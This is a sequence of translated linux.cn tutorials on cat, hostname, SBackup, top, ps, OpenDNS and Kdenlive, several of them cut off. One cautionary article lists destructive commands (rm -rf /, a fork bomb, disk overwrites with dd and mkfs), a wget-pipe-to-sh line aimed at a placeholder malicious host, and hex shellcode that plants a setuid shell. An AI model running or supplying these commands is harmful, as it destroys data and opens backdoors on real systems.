Linux

在Linux系统中，大多数配置文件、日志文件，甚至shell脚本都使用文本文件格式，因此，Linux系统存在着多种文本编辑器，但当你仅仅想要查看一下这些文件的内容时，可使用一个简单的命令-cat。

cat手册里这样描述：

cat命令读取文件内容，并输出到标准设备上面

cat是一条linux内置命令. 几乎所有linux发行版都内置（译注：或者说我从未听说过不内置cat命令的发行版）。接下来，让我们开始学习如何使用.

1. 显示文件内容

最简单的方法是直接输入‘cat file_name’.

# cat /etc/issue
CentOS release 5.10 (Final)
Kernel r on an m

2. 同时显示行号

当在读取内容很多的配置文件时，如果同时显示行号将会使操作变简单，加上-n参数可以实现.

# cat -n /etc/ntp.conf
1 # Permit time synchronization our time resource but do not
2 # permit the source to query or modify the service on this system
3 restrict default kod nomodify notrap nopeer noquery
4 restrict -6 default kod nomodify notrap nopeer noquery
5
6 # Permit all access over the loopback interface. This could be
7 # tightened as well, but to do so would effect some of the
8 # administration functions
9 restrict 127.0.0.1
10 restrict -6 ::1

3. 在非空格行首显示行号

类似于-n参数，-b也可以显示行号。区别在于-b只在非空行前显示行号。

#cat -b /etc/ntp.conf
1 # Permit time synchronization our time resource but do not
2 # permit the source to query or modify the service on this system
3 restrict default kod nomodify notrap nopeer noquery
4 restrict -6 default kod nomodify notrap nopeer noquery
5 # Permit all access over the loopback interface. This could be
6 # tightened as well, but to do so would effect some of the
7 # administration functions
8 restrict 127.0.0.1
9 restrict -6 ::1

4. 显示tab制表符

当你想要显示文本中的tab制表位时. 可使用-T参数. 它会在输入结果中标识为 ^I .

# cat -T /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1^I^Ilocalhost.localdomain localhost
::1^I^Ilocalhost6.localdomain6 localhost6

5. 显示换行符

-E参数在每行结尾使用 $ 表示换行符。如下所示 :

# cat -E /etc/hosts
# Do not remove the following line, or various programs$
# that require network functionality will fail.$
127.0.0.1 localhost.localdomain localhost$
::1 localhost6.localdomain6 localhost6$

6. 同时显示制表符及换行符

当你想要同时达到-T及-E的效果, 可使用-A参数.

# cat -A /etc/hosts
# Do not remove the following line, or various programs$
# that require network functionality will fail.$
127.0.0.1^I^Ilocalhost.localdomain localhost$
::1^I^Ilocalhost6.localdomain6 localhost6$

7. 分屏显示

当文件内容显示超过了你的屏幕大小, 可结合cat命令与其它命令分屏显示。使用管道符 ( | )来连接。

# cat /proc/meminfo | less
# cat /proc/meminfo | more

在less与more显示结果的区别在于less参数可pageup及pagedown上下翻滚。而more仅能使用空格向下翻屏。

8. 同时查看2个文件中的内容

位于/root文件夹里有两个文件取名linux及desktop，每个文件含有以下内容 :

Linux : ubuntu, centos, redhat, mint and slackware

Desktop : gnome kde, xfce, enlightment, and cinnamon

当你想同时查看两文件中的内容时，可按如下方法 :

# cat /root/linux /root/desktop
ubuntu
centos
redhat
mint
slackware
gnome
kde
xfce
enlightment
cinnamon

9. 排序显示

类似. 你也可以结合cat命令与其它命令来进行自定义输出. 如结合 sort ，通过管道符对内容进行排序显示。举例 :

# cat /root/linux | sort
centos
mint
redhat
slackware
Ubuntu

10. 输入重定向

你也可将显示结果输出重定向到屏幕或另一个文件。 只需要使用 > 符号（大于号）即可输出生成到另一个文件。

# cat /root/linux > /root/linuxdistro

以上命令会生成一个与/root/linux内容一模一样的叫linuxdistro的文件.

11. 新建文件

Linux下有多种方法新建文件。其中使用cat就是方法之一.

# cat > operating_system
Unix
Linux
Windows
MacOS

当你输入cat > operatingsystem，它会生成一个operatingsystem的文件。然后下面会显示空行。此时你可输入内容。比如我们输入Unix, Linux, Windows 和 MacOS， 输入完成后，按Ctrl-D存盘退出cat。此时你会发现当前文件夹下会生成一个包含你刚才输入内容的叫 operating_system的文件。

12.向文件中追加内容

当你使用两个 > 符时, 会将第一个文件中的内容追加到第二个文件的末尾。 举例 :

# cat /root/linux >> /root/desktop
# cat /root/desktop

它会将 /root/linux的内容追加到/root/desktop文件的末尾。

第二个文件的内容将会变成这样:

gnome
kde
xfce
enlightment
cinnamon
ubuntu
centos
redhat
mint
slackware

13. 重定向输入

你可使用 <命令（小于号）将文件输入到cat中.

# cat < /root/linux

上面命令表示 /root/linux中的内容作为cat的输入。屏幕上显示如下 :

ubuntu
centos
redhat
mint
slackware

为了更清楚表示它的意义，我们使用以下命令 :

# cat < /root/linux | sort > linux-sort

此命令这样理解: 从/root/linux中读取内容，然后排序，将结果输出并生成linux-sort新文件

然后我们看看linux-sort中的内容 :

centos
mint
redhat
slackware
ubuntu

以上是一些cat命令的日常基本应用. 更多相关你可从cat命令手册中学到并记得经常练习它们.

via: http://linoxide.com/linux-command/13-cat-command-examples/

译者：hongchuntang 校对：Caroline

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2336-1.html

随着连接到网络的计算机数量越来越多，每一台计算机都需要有一个属性来区别于其它计算机。和现实世界中的人一样，计算机也有一个叫做hostname（主机名）的属性。

什么是hostname

从它的操作手册来看，hostname是用来显示系统的DNS名字以及为了显示和设置它的主机名或者NIS域名名字。所以hostname依赖于DNS（Domain Name System域名系统）或者NIS（Network Information System网络信息系统）。

怎么显示hostname

hostname是为每一个linux发行版的预安装命令。通过在控制台输入hostname，可以显示你的机器的hostname。这里有一个有个简单的命令及其输出。

$ hostname
ubuntu

上面的命令将会告诉你，计算机的名字是ubuntu 。

如何设置hostname

Hostname是在你第一次安装Linux的时候设置。其中有一个步骤Linux会让你输入主机名称的信息。不过，如果你愿意的话，你在之后设置也可以。

设置你的hostname，你可以使用下面的命令：

# hostname dev-machine
$ hostname
dev-machine

你需要使用root权限，或者等同root的权限来设置/修改你计算机的主机名。“#”标识证明你是root用户。上述命令把你的计算机主机名设置成为dev-machine。如果你没有收到任何报错信息，那么你的hostname已经改变了。再一次使用hostname命令检查，看看结果。

使用hostname命令设置你的hostname 不是永久的 。当你重启你的计算机，你的设定将会失效。 为了永久改变 ，你必须手动修改hostname配置文件。

Debian / Ubuntu系的Linux

你可以在 /etc/hostname 和 /etc/hosts 文件夹中找到这个文件

下面是每一个文件的内容

/etc/hostname

# vi /etc/hostname
dev-machine

/etc/hosts

# vi /etc/hosts
127.0.0.1 localhost
127.0.0.1 dev-machine

你将会发现不用重启你的linux它就即刻生效。

RedHat / CentOS系的Linux

你可以在 /etc/hosts 和 /etc/sysconfig/networks 文件夹中找到这个文件。

下面是每一个文件的内容

/etc/hosts

127.0.0.1 localhost.localdomain localhost dev-machine
::localhost 127.0.0.1

/etc/sysconfig/network

NETWORKING=yes
NETWORKING_IPV6=no
HOSTNAME=dev-machine

怎么显示DNS域名

来自上面的hostname的定义，hostname也可以显示你的Linux的DNS名字。如果你的hostname命令会显示你的hostname，那么dnsdomainname命令也就会显示你的域名。来看看这个简单的例子。

$ dnsdomainname
bris.co.id

在本篇文章，dnsdomainname命令的结果是 bris.co.id。

如果你看见结果是 (none)，那么你的机器没有配置FQDN（Fully Qualified Domain Name 完全符合标准的域名） 。dnsdomainname命令摘取来自/etc/hosts文件的信息。你应该配置它为FQDN格式。下面是一个简单的例子：

/etc/hosts

127.0.0.1 localhost.localdomain localhost dev-machine
::localhost 127.0.0.1
192.168.0.104 dev-machine.bris.co.id dev-machine

为了显示更多的细节，你可以使用参数-v

$ dnsdomainname -v
gethostname()=’dev-machine.bris.co.id’
Resolving ‘dev-machine.bris.co.id’ …
Result: h_name=’dev-machine.bris.co.id’
Result: h_aliases=’dev-machine’
Result: h_addr_list=’192.168.0.104’

如何显示hostname的更多细节信息

Hostname命令可以使用多个参数和一些别名，比如dnsdomainname命令就是它的一个别名。这些参数在每日操作中是有用的。下面这些命令的结果是基于/etc/hosts的上述配置。

显示IP地址

$ hostname -i
192.168.0.104

显示域名

$ hostname -d
bris.co.id

显示短主机名 $ hostname -s dev-machine

这个命令将会产生与只输入hostname同样的结果

显示FQDN格式

$ hostname -f
dev-machine.bris.co.id

显示细节信息

所有的参数包括上述信息，都可以通过使用参数-v 和 -d 来概括。让我们来看一个例子。

$ hostname -v -d
gethostname()=’dev-machine.bris.co.id’
Resolving ‘dev-machine.bris.co.id’ …
 Result: h_name=’dev-machine.bris.co.id’
Result: h_aliases=’dev-machine’
Result: h_addr_list=’192.168.0.104’
bris.co.id

觉得熟悉吗？没错，运行结果与上面提到的 dnsdomainname -v 命令式相同的。

via: http://linoxide.com/linux-command/display-set-hostname-linux/

译者：Vic___ 校对：Caroline

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2339-1.html

SBackup 是一个简单易用的开源备份软件。它可以备份任意文件或者文件夹的一部分。所有的配置文件可以通过 Gnome 界面进行访问。文件和路径可以直接通过正则表达式进行添加和排除。它支持本地备份和远程备份。虽然它看起来简单，但是它有着许多常见的高级备份功能。

特点

SBackup 可以完成以下工作

• 可以创建压缩和未压缩的备份
• 可以把未压缩的备份分割成多份文件
• 支持多份备份配置。每个人都可以根据自己的需求创建并修改自己的配置文件，但是不能删除默认配置文件
• 有多种选项，如日志、邮件通知、以状态图标的形式展现和提醒
• 支持计划任务备份和手动备份
• 可以备份到本地（如硬盘），也可以备份到远程（如通过 FTP 访问 NAS）

在 Ubuntu、Linux Mint 和 Debian 上安装 SBackup

SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得，所以只要运行以下命令即可安装

sudo apt-get install sbackup

运行 SBackup

通过 Dash 或者 Menu 打开 SBackup

将会看到如下界面

SBackup 配置

最初的 SBackup 没有任何用户自定义的配置文件，只有默认的配置文件。需要注意的是，用户不能删除默认的配置文件。若要创建一个新的配置文件，点击 Tools -> Profile Manager，将看到如下窗口

单击 Add 来创建新配置文件，例子的文件用“sk”来命名

现在已经创建了新的配置文件。若要设置配置，先选择配置文件，再单击 Edit

现在看到 SBackup 的配置文件已经被切换到“sk”

当然，也可以根据不同人的需求来修改默认配置文件

注意事项：如果你用普通用户运行 SBackup，计划任务备份不能生效，你需要用 root 用户来运行。如上图所示，因为我是以普通用户运行 Sbackup，所以 Schedule 选项是灰色不可选中状态。

在本教程中，我将以 root 权限运行 SBackup，并且使用的是默认配置

打开终端，运行以下命令来以 root 权限运行 SBackup

sudo sbackup-config-gtk

上面的命令将以 root 权限打开默认配置的 SBackup

来源：https://linux.cn/article-2338-1.html

ping 想必大家都不会陌生。当我们想要知道网络是否通畅时往往就会执行这个命令。 不过，默认的 ping 命令输出比较单调乏味。因此，国外的某个老兄编写了 prettyping.sh 这个脚本，它不仅会加点色彩，还会来点图示。总之，看起来有点特别 就是了。

你可以从作者的 Blog 下载 prettyping.sh。 

via: https://linuxtoy.org/archives/prettyping.html 

Linux命令行佷有用、很高效，也很有趣，但有时候也很危险，尤其是在你不确定你自己在正在做什么时候。这篇文章并不打算引来你对Linux或linux 命令行的愤怒。我们只是想让你意识到在你运行某些命令时应该三思而后行。（译注：当然，以下命令通常都是在root权限下才能将愚蠢发挥到无可救药；在普通用户身份下，破坏的只是自己的一亩三分地。）

1. rm -rf 命令　

rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm 命令的选项。

• rm　命令在Linux下通常用来删除文件。
• rm -r 命令递归的删除文件夹，甚至是空的文件夹。（译注：个人认为此处应该是说错了，从常识看，应该是“甚至是非空的文件夹”）
• rm -f 命令能不经过询问直接删除‘只读文件’。（译注：Linux下删除文件并不在乎该文件是否是只读的，而只是在意其父目录是否有写权限。所以，-f这个参数只是表示不必一个个删除确认，而是一律悄悄删除。另外，原始的rm命令其实也是没有删除提示的，只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认，而-f则抑制了这个提示。）
• rm -rf / : 强制删除根目录下所有东东。（就是说删除完毕后，什么也没有了。。。）
• rm -rf *:　强制删除当前目录的所有文件。
• rm -rf . : 强制删除当前文件夹及其子文件夹。

从现在起，当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名，来预防用 ‘rm‘命令删除文件时的事故，它会要求你确认每一个删除请求。（译注：大多数发行版已经这样做了，如果还没有，请这样做，并在使用-f参数前一定考虑好你在做什么！译者本人有着血泪的教训啊。）

2. :(){:|:&};: 命令

这就是个fork 炸弹的实例。具体操作是通过定义一个名为 ‘:‘的函数，它会调用自己两次，一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

:(){:|:&};:

哦？你确认你要试试么？千万别在公司正式的服务器上实验啊~~

3. 命令　> /dev/sda

上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据，从而导致整个块设备的数据丢失。

4. mv 文件夹 /dev/null

这个命令会移动某个‘文件夹‘到/dev/null。在Linux中 /dev/null 或 null 设备是一个特殊的文件，所有写入它的数据都会被清除，然后返回写操作成功。（译注：这就是黑洞啊。当然，要说明的是，通过将文件夹移动到黑洞，并不能阻止数据恢复软件的救赎，所以，真正的彻底毁灭，需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。）

# mv /home/user/* /dev/null

上列命令会将User目录所有内容移动到/dev/null，这意味着所有东西都被‘卷入’黑洞　(null)之中。

5. wget http://malicious_source -O- | sh

上列命令会从一个（也许是）恶意源下载一个脚本并执行。Ｗget命令会下载这个脚本，而sh会（无条件的）执行下载下来的脚本。

注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。（译注：所以，你真的知道你在做什么吗？当遇到这种需要是，我的做法是，先wget下来，然后我去读一读其中到底写了些什么，然后考虑是否执行。）

6. mkfs.ext3 /dev/sda

上列命令会格式化块设备‘sda’，你无疑知道在执行上列命令后你的块设备(硬盘驱动器)会被格式化，崭新的!没有任何数据，直接让你的系统达到不可恢复的阶段。（译注：通常不会直接使用/dev/sda这样的设备，除非是作为raw设备使用，一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然，无论你使用sda还是sda1，这样对块设备或分区进行mkfs都是毁灭性的，上面的数据都会被蒸发了。）

7. > file

上列命令常用来清空文件内容（译注：通常也用于记录命令输出。不过请在执行前，确认输出的文件是空的或者还不存在，否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外，我想你可能真正想用的是“>>”，即累加新的输出到文件，而不是刷新那个文件。）。如果用上列执行时输入错误或无知的输入类似 “> xt.conf”　的命令会覆盖配置文件或其他任何的系统配置文件。

8. ^foo^bar

这个命令在我们十个鲜为人知的 Linux 命令 – Part 3中描述过，用来编辑先前运行的命令而无需重打整个命令。但当用^foobar命令时如果你没有彻底检查改变原始命令的风险，这可能导致真正的麻烦。（译注：事实上，这种小技巧是译者认为的，少数史前时代遗留下来的无用而有害的“黑客”技巧。）

9. dd if=/dev/random of=/dev/sda

上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然！你的系统可能陷入混乱和不可恢复的状态。（译注：记得上面说过mv到黑洞并不能彻底删除数据么？那么这个命令就是给了你一个彻底删除的方法！当然为了保险起见，你可以覆写多次。）

10. 隐藏命令　

下面的命令其实就是上面第一个命令 (rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。

这个命令表明通常真正的危险是隐藏的，不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译／运行从未知来源的代码。

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令。如果你想测试它们，请在虚拟机上运行。任何不和谐或数据丢失，由于运行上面的命令导致你的系统崩溃，文章作者和Tecmint概不负责。（译注：译者和转载网站也不负责~！）

今天就到此为止吧，我会很快回来这里，同时带上另一篇你们喜欢的文章。到那时请继续关注和访问Tecmint。如果你知道任何其他危险的Linux命令，也想添加到我们的列表中，请通过评论留言给我们同时也别忘了留下你的宝贵意见。

via: http://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/

译者：Luoxcat 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2341-1.html

互联网是个大熔炉。无论是好人还是坏人，都可以和我们一样连接到网络。那些制作病毒感染人们电脑的坏蛋以及寻求保护人们的好人们全都连接到同一网络中。

就像人们所说的那样，互联网是过去所出现的一个最好的东东。它包含着任何人都可以获取的有价值的信息和资源，且大部分可以免费获取。一些最著名高校的人提供了免费的高质量课程，可供任何想学习的人来学习。今天，我们都可以连入互联网真是一件好事情。

但是有些事情你一定要记住，当你连入互联网时，你的电脑就成了攻击的目标。成为病毒，木马和其它程序破坏的目标。

正因为此，推荐连入互联网的电脑都要使用反病毒和反间谍软件来保护。在有些情况下，即使使用了这些软件也不能完全保证你的安全。再添加一个安全层总是一个好主意。

当寻找添加一个额外的安全层去保护你的机器时，使用OpenDNS的安全DNS框架可能会有帮助。因特网有许多部分组成，尽力对其每一部分都进行相应保护是保证安全的最好方法。

首先，你要在你的电脑上安装反病毒和反间谍软件。由于浏览因特网时允许你的电脑查询远程DNS服务器，因此使用受保护的安全的DNS服务器将是保护你电脑安全的好方法。（译注：我们认为，其实在Ubuntu上使用反病毒和反间谍软件并不太必要，但是使用OpenDNS来拦截对恶意网址的访问是有必要的。另外，使用国外的DNS可能会比较慢，也许过一段时间，国内也会出现类似的服务。）

这是一个简明手册，告诉你如何在Ubuntu上配置OpenDNS框架以便保护你的电脑。

sudo gedit /etc/dhcp/dhclient.conf

最后，在打开的文件中添加下面一行，然后保存。

supersede domain-name-servers 208.67.222.222,208.67.220.220;

重启你的电脑，祝你玩的开心！

好好享受吧！

via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tipsprotect-your-computers-using-opendns-secure-dns-infrastructure/

译者：Linux-pdz 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2348-1.html

Linux中的top命令显示系统上正在运行的进程。它是系统管理员最重要的工具之一。被广泛用于监视服务器的负载。在本篇中，我们会探索top命令的细节。top命令是一个交互命令。在运行top的时候还可以运行很多命令。我们也会探索这些命令。

（译注：不同发行版的top命令在各种细节有不同，如果发现不同时，请读你的帮助手册和命令内的帮助。）

1. Top 命令输出:

首先，让我们了解一下输出。top命令会显示系统的很多信息。我们需要理解不同部分输出的意义：默认运行时，top命令会显示如下输出：

前几行水平显示了不同系统参数的概括，接下来是进程和它们在列中的属性。

1.1 系统运行时间和平均负载：

top命令的顶部显示与uptime命令相似的输出。

这些字段显示：

• 当前时间
• 系统已运行的时间
• 当前登录用户的数量
• 相应最近5、10和15分钟内的平均负载。

可以使用’l’命令切换uptime的显示。

1.2 任务:

第二行显示的是任务或者进程的总结。进程可以处于不同的状态。这里显示了全部进程的数量。除此之外，还有正在运行、睡眠、停止、僵尸进程的数量（僵尸是一种进程的状态）。这些进程概括信息可以用’t’切换显示。

1.3 CPU 状态:

下一行显示的是CPU状态。 这里显示了不同模式下的所占CPU时间的百分比。这些不同的CPU时间表示:

• us, user： 运行(未调整优先级的) 用户进程的CPU时间
• sy，system: 运行内核进程的CPU时间
• ni，niced：运行已调整优先级的用户进程的CPU时间
• wa，IO wait: 用于等待IO完成的CPU时间
• hi：处理硬件中断的CPU时间
• si: 处理软件中断的CPU时间
• st：这个虚拟机被hypervisor偷去的CPU时间（译注：如果当前处于一个hypervisor下的vm，实际上hypervisor也是要消耗一部分CPU处理时间的）。

可以使用’t’命令切换显示。

1.4 内存使用:

接下来两行显示内存使用率，有点像’free’命令。第一行是物理内存使用，第二行是虚拟内存使用(交换空间)。

物理内存显示如下:全部可用内存、已使用内存、空闲内存、缓冲内存。相似地：交换部分显示的是：全部、已使用、空闲和缓冲交换空间。

内存显示可以用’m’命令切换。

1.5 字段/列:

在横向列出的系统属性和状态下面，是以列显示的进程。不同的列代表下面要解释的不同属性。

默认上，top显示这些关于进程的属性：

PID

进程ID，进程的唯一标识符

USER

进程所有者的实际用户名。

PR

进程的调度优先级。这个字段的一些值是’rt’。这意味这这些进程运行在实时态。

NI

进程的nice值（优先级）。越小的值意味着越高的优先级。

VIRT

进程使用的虚拟内存。

RES

驻留内存大小。驻留内存是任务使用的非交换物理内存大小。

SHR

SHR是进程使用的共享内存。

S

这个是进程的状态。它有以下不同的值:

• D – 不可中断的睡眠态。
• R – 运行态
• S – 睡眠态
• T – 被跟踪或已停止
• Z – 僵尸态

%CPU

自从上一次更新时到现在任务所使用的CPU时间百分比。

%MEM

进程使用的可用物理内存百分比。

TIME+

任务启动后到现在所使用的全部CPU时间，精确到百分之一秒。

COMMAND

运行进程所使用的命令。

还有许多在默认情况下不会显示的输出，它们可以显示进程的页错误、有效组和组ID和其他更多的信息。

2. 交互命令:

我们之前说过top是一个交互命令。上一节我们已经遇到了一些命令。这里我们会探索更多的命令。

2.1 ‘h’: 帮助

首先，我们可以用’h’或者’?’显示交互命令的帮助菜单。

2.2 ‘’ 或者 ‘’: 刷新显示

top命令默认在一个特定间隔(3秒)后刷新显示。要手动刷新，用户可以输入回车或者空格。

2.3 ‘A’: 切换交替显示模式

这个命令在全屏和交替模式间切换。在交替模式下会显示4个窗口（译注：分别关注不同的字段）:

1. Def （默认字段组）
2. Job （任务字段组）
3. Mem （内存字段组）
4. Usr （用户字段组）

这四组字段共有一个独立的可配置的概括区域和它自己的可配置任务区域。4个窗口中只有一个窗口是当前窗口。当前窗口的名称显示在左上方。（译注：只有当前窗口才会接受你键盘交互命令）

我们可以用’a’和’w’在4个 窗口间切换。’a’移到后一个窗口，’w’移到前一个窗口。用’g’命令你可以输入一个数字来选择当前窗口。

2.4 ‘B’: 触发粗体显示

一些重要信息会以加粗字体显示。这个命令可以切换粗体显示。

2.5 ‘d’ 或‘s’: 设置显示的刷新间隔

当按下’d’或’s’时，你将被提示输入一个值（以秒为单位），它会以设置的值作为刷新间隔。如果你这里输入了1，top将会每秒刷新。

来源：https://linux.cn/article-2352-1.html

一图胜千言，一个精心设计的指导视频更是能给你带来良好体验。Linux上有你需要的制作有用且高质量教学视频的所有工具。我们将用强大的kdenlive视频编辑器和Audacity音频录制器和编辑器制作一个简单的屏幕录像，并学习如何在YouTube上分享精彩的屏幕录像。

一台安装了Kdenlive和Audacit软件的Linux系统PC，一个质量好的麦克风或耳机，和一个YouTube的帐号就是你需要准备的全部。（是的，除了Youtube还有很多其他的免费视频共享服务，你也可以使用它们。）YouTube属于Google，Google想让你与全世界共享任何人和事。如果这不是你想做的，请说no。

我们的工作流程是这样的：

• 用Kdenlive录制屏幕录像
• 用Audacity录制音轨
• 添加音轨到Kdenlive
• 上传到YouTube
• 全世界看你的视频，好开心

kdenlive支持最流行的数字视频格式，包括AVI，MP4，H.264，和MOV。它支持的图像文件包括GIF，PNG，SVG和TIFF；支持的音频文件格式，包括非压缩的PCM，Vorbis，WAV，MP3和 AC3。你甚至可以阅读和编辑Flash文件。总之，它可以处理很多东西。

你的配音与你的视频一样重要。请一定要重视你的音频。使音频保持干净和简单，去除杂乱的题外话、方言，并将背景噪声降到最低点。我喜欢用一个质量好的耳麦做讲述，这样你不必担心话筒位置，你可以反复听你自己的讲述而不会影响到你身边的人。

Kdenlive的文档已过期，它会告诉你制作屏幕录像需要RecordMyDesktop软件。我用的是kdenlive 0.9.4，其实不需要Recordmydesktop。

图 1：默认配置

制作屏幕录像

首次安装kdenlive,第一次运行时会启动配置向导。不必在意默认设置，因为你随时都可以改变它们。

这是我的屏幕录像的设置：高清720p每秒30帧，1280×720的屏幕尺寸。如何知道该使用什么设置项？ Google上有一些说明。设置这些值可到Settings > Configure Kdenlive > Project Defaults > Default Profile > HD 720p 30fps（图1）。

设置捕捉屏幕的大小到 Settings > Configure Kdenlive > Capture > Screen Grab（图2）。虽然你也可以选择捕捉全屏幕，但最好还是坚持用YouTube规定的尺寸。因为如果使用的尺寸与YouTube规定的不一样，则YouTube将增加黑边来达到合适的尺寸。热切的观众会更加希望看到一个充满生动的内容的屏幕，而不是黑边。

图 2：屏幕录像的屏幕大小

默认的YouTube视频播放器的大小是640×360标清320p，又小又模糊。播放器有小屏，大屏，全屏，和多个质量等级的控制。这些设置只有你的观众会使用，640×360标清320p看起来真的不咋样，但郁闷的是你无法改变这个缺陷。尽管如此，你仍然想制作高质量视频的话，你可以添加一些文字来提醒观众尝试更好的配置。

保存你的项目

在你做任何其他事情之前，点击 File->Save as 保存您的项目，并记住周期性地保存它。

抓取屏幕

抓屏小菜一碟。到Record Monitor，选择Screen Grab，然后点击Record按钮。屏幕上将打开一个带虚线的框，框里面的所有内容都将被录制下来。因此，你需要做的所有事就是移动框并调整框的大小到你想要l录制的范围。完成后点击停止按钮（图3）。

图 3：屏幕抓取

单击Stop，自动打开Clip Monitor，你可以预览你的裁剪效果。如果你觉得不错，把它从Project Tree中拖到Video 1轨道。现在你可以编辑你的视频了。总会有需要你修剪的地方；一个快速的方法是，你在Project Monitor里播放你的剪辑片，直到播放到你需要移除部分的末尾。然后暂停，然后按下Shift+r。你的剪辑片将会在你按下停止的时间轴上的点上被切割为两个剪辑。点击你要删除的片断，按下Delete键，噗！它就消失了。

对于剩下的剪辑片断，可能你想要从时间轴上的某一点开始播放，也可能你想要加入一些好的变换。比如一些简单的渐变就相当不错；右键点击你的剪辑片断，点击Add Effect > Fade > Fade from black 和 Fade to black，然后Kdenlive将自动将这两个效果放到开头和末尾。

添加配音

请参阅Whirlwind Intro to Audacity on Linux: From Recording to CD in One Lesson来学习使用Audacity录音的基础操作。以16bit的wav格式导出你的音频文件，然后通过Project > Add Clip导入到Kdenlive。然后将你的新音频剪辑拖到Audio tracks。一个简单的制作视频讲述的方式是边播视频边说。运气好的话，你不需要做很多的清理工作，你的讲述就会与视频同步。

图 4：用Shift+r切割音轨，然后将其中一个剪辑片从切割点拖离，创建一个静音间隙

如果你的语速比视频快,你可以在音轨中添加空档时间.很简单,用Shift+r切割音轨，然后将其中一个剪辑片从切割点拖离，创建一个静音间隙。（图4）。

Rendering Your Project ### 渲染你的项目

当你满意自己的编辑，并准备导出你的最终格式时，点击Render按钮。这需要几分钟的时间，取决于你的电脑速度和项目大小。已有为网站预先设定的值，如果你选择File Rendering， 你可以调整你的设置（图5）。我用File Rendering中的H.264，Video比特率12000， Audio比特率384取得了不错的效果。H.264是一种超压缩格式，使用这种格式发布的文件小但质量好。

图 5：选择文件渲染，调整你的网页设置

发布到YouTube

现在你可以在VLC或MPlayer或你喜欢的任何播放器中播放你的视频了，如果它看起来很好，那么你就可以将它上传到你的YouTube帐户里了。YouTube是典型的Google风格，信息中心和视频管理器会混乱又复杂，不过请坚持多研究下，你会理出头绪的。在你做任何事情之前，你必须对你的账户做资格认证，也就是通过短信和邮件获得一个验证码。通过输入验证码证明你不是一个网络爬虫后，你就能上传你的视频了。

你可以上传你的视频，然后标记它们为私人可见或所有人可见。Google有一些编辑工具，你可能会喜欢，比如自动纠错和配背景音乐。不过以我的拙见，几乎没有人是这样子做背景音乐的，所以这种工具只会令人讨厌。不过你有可能是第一个正确使用这个工具的人哦。

最有用的编辑工具是自动字幕。我推荐在你所有的视频上使用此功能，不光是为了那些听觉障碍的人，也为了那些需要保持低音量观看的人，确保所有的人都明白你在说什么。字幕工具也能创建副本。

另一个有用的工具是注释工具，它支持对话气泡，标题，聚光灯和标签。当然，在Kdenlive中，这些你都可以做到，所以都可以尝试一下。

好吧，到这里就结束了，但似乎我们刚刚开始。请分享你的视频，并在评论中添加Youtube的小建议和技巧。如果可以的话，请在video.linux.com分享你的新的视频教程，并参加100个Linux教程比赛。

来源于: http://www.linux.com/learn/tutorials/745745-how-to-make-a-youtube-instructional-screencast-video-on-linux/

译者：coolpigs 校对：jasminepeng

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2359-1.html

Linux ps 命令

linux的ps命令是一个查看系统运行的进程的一个最基础的工具。它提供了一个当前进程的快照，还带有一些具体的信息，比如用户id，cpu使用率，内存使用，命令名等，它不会像top或者htop一样实时显示数据。虽然它在功能和输出上更加简单，但它仍然是每个linux新手需要了解和学好的必要进程管理/检测工具。

在本篇中，我们会学习ps命令基本的用法：查找、过滤，以不同的方式排序。

语法说明

ps命令有两种不同风格的语法规则：BSD风格和UNIX风格。Linux新手经常感到困惑并会误解这两种风格，所以在继续下一步之前，我们来弄清楚一些基本的信息。

注意: “ps aux”不等同于”ps -aux”。比如”-u”用于显示用户的进程，但是”u”意味着显示具体信息。

BSD 形式 – BSD形式的语法的选项前没有破折号，如：

ps aux

UNIX/LINUX 形式 – linux形式的语法的选项前有破折号，如：

ps -ef

在linux系统上混合这两种语法是可以的。比如 “ps ax -f”。但是本章中我们主要讨论UNIX形式语法。

如何使用ps命令

1. 显示所有进程

下面的命令可以显示所有进程的列表。

$ ps ax
$ ps -ef

通过管道输出到”less”可以分页。

使用”u”或者”-f”选项可以显示进程的具体信息。

$ ps aux
$ ps -ef -f

为什么USER列显示的不是我的用户名，但是其他的像root，www-data等却显示？ 对于所有的用户(包括你们的)，如果长度大于8个字符，那么ps只会显示你的UID而不是用户名。

2. 显示用户进程

使用”-u”选项后跟用户名来过滤所属用户的进程。多个用户名可以用逗号分隔。

$ ps -f -u www-data
UID        PID  PPID  C STIME TTY          TIME CMD
www-data  1329  1328  0 09:32 ?        00:00:00 nginx: worker process
www-data  1330  1328  0 09:32 ?        00:00:00 nginx: worker process
